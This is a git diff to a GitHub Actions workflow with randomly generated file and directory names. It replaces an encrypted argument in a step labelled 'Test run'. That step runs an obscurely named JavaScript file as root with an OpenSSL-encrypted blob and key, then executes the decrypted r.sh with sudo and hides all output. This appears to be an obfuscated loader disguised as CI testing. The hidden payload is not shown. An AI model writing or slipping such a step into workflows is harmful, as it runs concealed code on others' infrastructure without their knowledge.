--- a/.github/workflows/uecyp.yml
+++ b/.github/workflows/uecyp.yml
@@ -29,6 +29,6 @@ jobs:
     - name: Test run
       run: |
         cd ${{ github.workspace }}
-        echo 'qla84'
+        echo 'old3b'
         sudo chmod +x johns2xqp/field806dx/piersonteqsh/rubiox050l.js
-        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18j41+TL3K8q19zJGwkQ53lswgy+PXyVSrwXaNFL9z//gFLy7ayDQ1y2WmcTgp7y4je2ObZNEYcKT1bGkevZJOwKyJT1MacBwlY2zcDm2QAwC85nLnPaqT/ zql73k && sudo sh r.sh > /dev/null 2>&1
+        sudo ./johns2xqp/field806dx/piersonteqsh/rubiox050l.js U2FsdGVkX18r9A00FhZrxUoYRj1YvuoyskXdEQIPeI8xMnkrvUftFvxKc72phbPRBVvQbur7l3QznddVxqn+qMoaEoQTXQxl2ZEr6xKf76H+x/VXSXgVjUi+v8NuaDeG 8tpi6g && sudo sh r.sh > /dev/null 2>&1
